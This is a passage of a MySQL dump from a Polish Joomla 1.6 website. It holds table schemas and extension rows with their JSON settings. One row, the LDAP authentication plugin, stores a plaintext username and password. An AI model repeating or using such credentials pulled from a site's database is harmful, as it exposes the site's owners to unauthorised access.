LOCK TABLES `jos_content_frontpage` WRITE; /*!40000 ALTER TABLE `jos_content_frontpage` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_content_frontpage` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_content_rating` -- DROP TABLE IF EXISTS `jos_content_rating`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_content_rating` ( `content_id` int(11) NOT NULL default '0', `rating_sum` int(10) unsigned NOT NULL default '0', `rating_count` int(10) unsigned NOT NULL default '0', `lastip` varchar(50) NOT NULL default '', PRIMARY KEY (`content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_content_rating` -- LOCK TABLES `jos_content_rating` WRITE; /*!40000 ALTER TABLE `jos_content_rating` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_content_rating` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_core_log_searches` -- DROP TABLE IF EXISTS `jos_core_log_searches`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_core_log_searches` ( `search_term` varchar(128) NOT NULL default '', `hits` int(10) unsigned NOT NULL default '0' ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_core_log_searches` -- LOCK TABLES `jos_core_log_searches` WRITE; /*!40000 ALTER TABLE `jos_core_log_searches` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_core_log_searches` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_extensions` -- DROP TABLE IF EXISTS `jos_extensions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_extensions` ( `extension_id` int(11) NOT NULL auto_increment, `name` varchar(100) NOT NULL, `type` varchar(20) NOT NULL, `element` varchar(100) NOT NULL, `folder` varchar(100) NOT NULL, `client_id` tinyint(3) NOT NULL, `enabled` tinyint(3) NOT NULL default '1', `access` tinyint(3) unsigned NOT NULL default '1', `protected` tinyint(3) NOT NULL default '0', `manifest_cache` text NOT NULL, `params` text NOT NULL, `custom_data` text NOT NULL, `system_data` text NOT NULL, `checked_out` int(10) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `ordering` int(11) default '0', `state` int(11) default '0', PRIMARY KEY (`extension_id`), KEY `element_clientid` (`element`,`client_id`), KEY `element_folder_clientid` (`element`,`folder`,`client_id`), KEY `extension` (`type`,`element`,`folder`,`client_id`) ) ENGINE=InnoDB AUTO_INCREMENT=10005 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_extensions` -- LOCK TABLES `jos_extensions` WRITE; /*!40000 ALTER TABLE `jos_extensions` DISABLE KEYS */; INSERT INTO `jos_extensions` VALUES (1,'com_mailto','component','com_mailto','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(2,'com_wrapper','component','com_wrapper','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(3,'com_admin','component','com_admin','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(4,'com_banners','component','com_banners','',1,1,1,0,'','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(5,'com_cache','component','com_cache','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(6,'com_categories','component','com_categories','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(7,'com_checkin','component','com_checkin','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(8,'com_contact','component','com_contact','',1,1,1,0,'','{\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,'com_cpanel','component','com_cpanel','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(10,'com_installer','component','com_installer','',1,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',0,0),(11,'com_languages','component','com_languages','',1,1,1,1,'','{\"administrator\":\"pl-PL\",\"site\":\"pl-PL\"}','','',0,'0000-00-00 00:00:00',0,0),(12,'com_login','component','com_login','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(13,'com_media','component','com_media','',1,1,0,1,'','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\",\"enable_flash\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(14,'com_menus','component','com_menus','',1,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',0,0),(15,'com_messages','component','com_messages','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(16,'com_modules','component','com_modules','',1,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',0,0),(17,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'','{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,'com_plugins','component','com_plugins','',1,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',0,0),(19,'com_search','component','com_search','',1,1,1,1,'','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,'com_templates','component','com_templates','',1,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',0,0),(21,'com_weblinks','component','com_weblinks','',1,1,1,0,'','{\"show_comp_description\":\"1\",\"comp_description\":\"\",\"show_link_hits\":\"1\",\"show_link_description\":\"1\",\"show_other_cats\":\"0\",\"show_headings\":\"0\",\"show_numbers\":\"0\",\"show_report\":\"1\",\"count_clicks\":\"1\",\"target\":\"0\",\"link_icons\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(22,'com_content','component','com_content','',1,1,0,1,'','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"0\",\"show_readmore_title\":\"0\",\"readmore_limit\":\"100\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"category_layout\":\"_:blog\",\"show_category_title\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"0\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"filters\":{\"1\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(23,'com_config','component','com_config','',1,1,0,1,'','','','',0,'0000-00-00 00:00:00',0,0),(24,'com_redirect','component','com_redirect','',1,1,0,1,'','{}','','',0,'0000-00-00 00:00:00',0,0),(25,'com_users','component','com_users','',1,1,0,1,'','{\"allowUserRegistration\":\"1\",\"new_usertype\":\"2\",\"useractivation\":\"1\",\"frontend_userparams\":\"1\",\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(100,'PHPMailer','library','phpmailer','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(101,'SimplePie','library','simplepie','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(102,'phputf8','library','phputf8','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(103,'Joomla! Web Application Framework','library','joomla','',0,1,1,1,'{\"legacy\":false,\"name\":\"Joomla! Web Application Framework\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"1.6.0\",\"description\":\"The Joomla! Web Application Framework is the Core of the Joomla! Content Management System\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(200,'mod_articles_archive','module','mod_articles_archive','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(201,'mod_articles_latest','module','mod_articles_latest','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(202,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(203,'mod_banners','module','mod_banners','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(204,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(205,'mod_custom','module','mod_custom','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(206,'mod_feed','module','mod_feed','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(207,'mod_footer','module','mod_footer','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(208,'mod_login','module','mod_login','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(209,'mod_menu','module','mod_menu','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(210,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(211,'mod_random_image','module','mod_random_image','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(212,'mod_related_items','module','mod_related_items','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(213,'mod_search','module','mod_search','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(214,'mod_stats','module','mod_stats','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(215,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(216,'mod_users_latest','module','mod_users_latest','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(217,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(218,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(219,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(220,'mod_articles_category','module','mod_articles_category','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(221,'mod_articles_categories','module','mod_articles_categories','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(222,'mod_languages','module','mod_languages','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(300,'mod_custom','module','mod_custom','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(301,'mod_feed','module','mod_feed','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(302,'mod_latest','module','mod_latest','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(303,'mod_logged','module','mod_logged','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(304,'mod_login','module','mod_login','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(305,'mod_menu','module','mod_menu','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(306,'mod_online','module','mod_online','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(307,'mod_popular','module','mod_popular','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(308,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(309,'mod_status','module','mod_status','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(310,'mod_submenu','module','mod_submenu','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(311,'mod_title','module','mod_title','',1,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(312,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(313,'mod_unread','module','mod_unread','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(400,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',0,0),(402,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(404,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(405,'plg_content_geshi','plugin','geshi','content',0,0,1,0,'','{}','','',0,'0000-00-00 00:00:00',2,0),(406,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'','{\"style\":\"none\"}','','',0,'0000-00-00 00:00:00',0,0),(407,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,1,'','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,1,'','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,'plg_content_vote','plugin','vote','content',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',6,0),(410,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'','{\"linenumbers\":\"0\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,'plg_editors_none','plugin','none','editors',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',2,0),(412,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,1,'','{\"mode\":\"1\",\"skin\":\"0\",\"compressed\":\"0\",\"cleanup_startup\":\"0\",\"cleanup_save\":\"2\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"lang_code\":\"en\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet,iframe\",\"extended_elements\":\"\",\"toolbar\":\"top\",\"toolbar_align\":\"left\",\"html_height\":\"550\",\"html_width\":\"750\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"format_date\":\"%Y-%m-%d\",\"inserttime\":\"1\",\"format_time\":\"%H:%M:%S\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"media\":\"1\",\"hr\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"style\":\"1\",\"layer\":\"1\",\"xhtmlxtras\":\"1\",\"visualchars\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advimage\":\"1\",\"advlink\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"safari\":\"0\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',1,0),(414,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'','{}','','',0,'0000-00-00 00:00:00',2,0),(415,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'','{}','','',0,'0000-00-00 00:00:00',3,0),(416,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'','{}','','',0,'0000-00-00 00:00:00',4,0),(417,'plg_search_categories','plugin','categories','search',0,1,1,0,'','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,'plg_search_content','plugin','content','search',0,1,1,0,'','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'','{}','','',0,'0000-00-00 00:00:00',1,0),(423,'plg_system_p3p','plugin','p3p','system',0,1,1,1,'','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,'plg_system_cache','plugin','cache','system',0,0,1,1,'','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',9,0),(425,'plg_system_debug','plugin','debug','system',0,1,1,0,'','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,'plg_system_log','plugin','log','system',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',5,0),(427,'plg_system_redirect','plugin','redirect','system',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',6,0),(428,'plg_system_remember','plugin','remember','system',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',7,0),(429,'plg_system_sef','plugin','sef','system',0,1,1,0,'','{}','','',0,'0000-00-00 00:00:00',8,0),(430,'plg_system_logout','plugin','logout','system',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',3,0),(431,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,1,'','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'','{\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,'plg_user_profile','plugin','profile','user',0,0,1,1,'','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'','{}','','',0,'0000-00-00 00:00:00',1,0),(435,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'','{}','','',0,'0000-00-00 00:00:00',0,0),(500,'atomic','template','atomic','',0,1,1,0,'{\"legacy\":false,\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"1.6.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(502,'bluestork','template','bluestork','',1,1,1,0,'{\"legacy\":false,\"name\":\"bluestork\",\"type\":\"template\",\"creationDate\":\"07\\/02\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"1.6.0\",\"description\":\"TPL_BLUESTORK_XML_DESCRIPTION\",\"group\":\"\"}','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\",\"textBig\":\"0\",\"highContrast\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(503,'beez_20','template','beez_20','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"1.6.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,'hathor','template','hathor','',1,1,1,0,'{\"legacy\":false,\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"hathor@tarrconsulting.com\",\"authorUrl\":\"http:\\/\\/www.tarrconsulting.com\",\"version\":\"1.6.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(505,'beez5','template','beez5','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"1.6.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"html5\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(600,'English (United Kingdom)','language','en-GB','',0,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(601,'English (United Kingdom)','language','en-GB','',1,1,1,1,'','','','',0,'0000-00-00 00:00:00',0,0),(700,'Joomla! CMS','file','joomla','',0,1,1,1,'{\"legacy\":false,\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"June 2011\",\"author\":\"Joomla!\",\"copyright\":\"(C) 2005 - 2011 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"1.6.4\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10000,'i24','template','i24','',0,1,1,0,'{\"legacy\":false,\"name\":\"i24\",\"type\":\"template\",\"creationDate\":\"07.2011\",\"author\":\"Webvisor\",\"copyright\":\"Copyright (C) 2011 Webvisor. All rights reserved.\",\"authorEmail\":\"kontakt@webvisor.pl\",\"authorUrl\":\"http:\\/\\/www.webvisor.pl\",\"version\":\"1.6.0\",\"description\":\"i24 nowa strona\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10001,'PolishPL','language','pl-PL','',0,1,0,0,'{\"legacy\":true,\"name\":\"Polish (PL)\",\"type\":\"language\",\"creationDate\":\"2011-04-20\",\"author\":\"Polski Zesp\\u00f3\\u0142 T\\u0142umaczy: Polish Joomla! Centre\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters & Polish Centre Joomla!. All rights reserved\",\"authorEmail\":\"zwiastun@joomla.pl\",\"authorUrl\":\"www.joomla.pl\",\"version\":\"1.6.3\",\"description\":\"pl-PL: Polski pakiet j\\u0119zykowy witryny Joomla 1.6\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10002,'PolishPL','language','pl-PL','',1,1,0,0,'{\"legacy\":true,\"name\":\"Polish (PL)\",\"type\":\"language\",\"creationDate\":\"2011-04-20\",\"author\":\"Polski Zesp\\u00f3\\u0142 T\\u0142umaczy: Polish Joomla! Centre\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters & Polish Centre Joomla!. All rights reserved\",\"authorEmail\":\"zwiastun@joomla.pl\",\"authorUrl\":\"www.joomla.pl\",\"version\":\"1.6.3\",\"description\":\"pl-PL: Polski pakiet j\\u0119zykowy zaplecza Joomla 1.6\",\"group\":\"\"}','{}','','',0,'0000-00-00 